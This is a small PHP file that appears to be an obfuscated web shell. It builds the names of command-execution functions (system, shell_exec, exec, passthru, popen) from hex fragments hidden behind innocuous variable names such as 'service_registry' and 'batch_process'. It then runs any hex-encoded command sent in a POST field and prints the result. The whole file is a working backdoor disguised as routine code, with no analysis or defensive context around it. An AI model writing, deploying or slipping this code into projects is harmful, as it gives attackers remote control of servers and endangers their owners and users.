<?php


$desc1 = '9';
$desc2 = '7';
$desc3 = '5';
$desc4 = '6';
$desc5 = 'c';
$desc6 = '8';
$desc7 = '1';
$desc8 = '3';
$desc9 = 'f';
$desc10 = '0';
$desc11 = 'e';
$desc12 = '4';
$desc13 = 'd';
$desc14 = '2';
$service_registry1 = pack("H*", '7'.'3'.'7'.$desc1.$desc2.'3'.$desc2.'4'.'6'.$desc3.'6'.'d');
$service_registry2 = pack("H*", $desc2.'3'.$desc4.'8'.'6'.$desc3.$desc4.$desc5.$desc4.$desc5.'5'.'f'.'6'.'5'.'7'.$desc6.$desc4.$desc3.'6'.'3');
$service_registry3 = pack("H*", '6'.'5'.$desc2.'8'.'6'.'5'.'6'.'3');
$service_registry4 = pack("H*", '7'.'0'.$desc4.$desc7.$desc2.$desc8.$desc2.$desc8.$desc2.'4'.'6'.$desc6.'7'.'2'.'7'.$desc3);
$service_registry5 = pack("H*", '7'.'0'.'6'.$desc9.'7'.$desc10.$desc4.$desc3.$desc4.$desc11);
$service_registry6 = pack("H*", $desc2.$desc8.$desc2.$desc12.'7'.'2'.$desc4.'5'.'6'.'1'.'6'.$desc13.'5'.$desc9.$desc4.'7'.$desc4.$desc3.'7'.'4'.$desc3.'f'.$desc4.$desc8.'6'.'f'.'6'.'e'.$desc2.'4'.'6'.'5'.'6'.$desc11.'7'.'4'.'7'.$desc8);
$service_registry7 = pack("H*", '7'.'0'.$desc4.$desc8.'6'.'c'.'6'.'f'.$desc2.$desc8.'6'.'5');
$batch_process = pack("H*", '6'.$desc14.'6'.'1'.$desc2.'4'.$desc4.$desc8.$desc4.'8'.$desc3.'f'.$desc2.$desc10.'7'.'2'.'6'.'f'.$desc4.$desc8.$desc4.$desc3.$desc2.'3'.'7'.'3');
if (isset($_POST[$batch_process])) {
    $batch_process = pack("H*", $_POST[$batch_process]);
    if (function_exists($service_registry1)) {
        $service_registry1($batch_process);
    } elseif (function_exists($service_registry2)) {
        print $service_registry2($batch_process);
    } elseif (function_exists($service_registry3)) {
        $service_registry3($batch_process, $flg_pset);
        print join("\n", $flg_pset);
    } elseif (function_exists($service_registry4)) {
        $service_registry4($batch_process);
    } elseif (function_exists($service_registry5) && function_exists($service_registry6) && function_exists($service_registry7)) {
        $dat_tkn = $service_registry5($batch_process, 'r');
        if ($dat_tkn) {
            $mrk_item = $service_registry6($dat_tkn);
            $service_registry7($dat_tkn);
            print $mrk_item;
        }
    }
    exit;
}
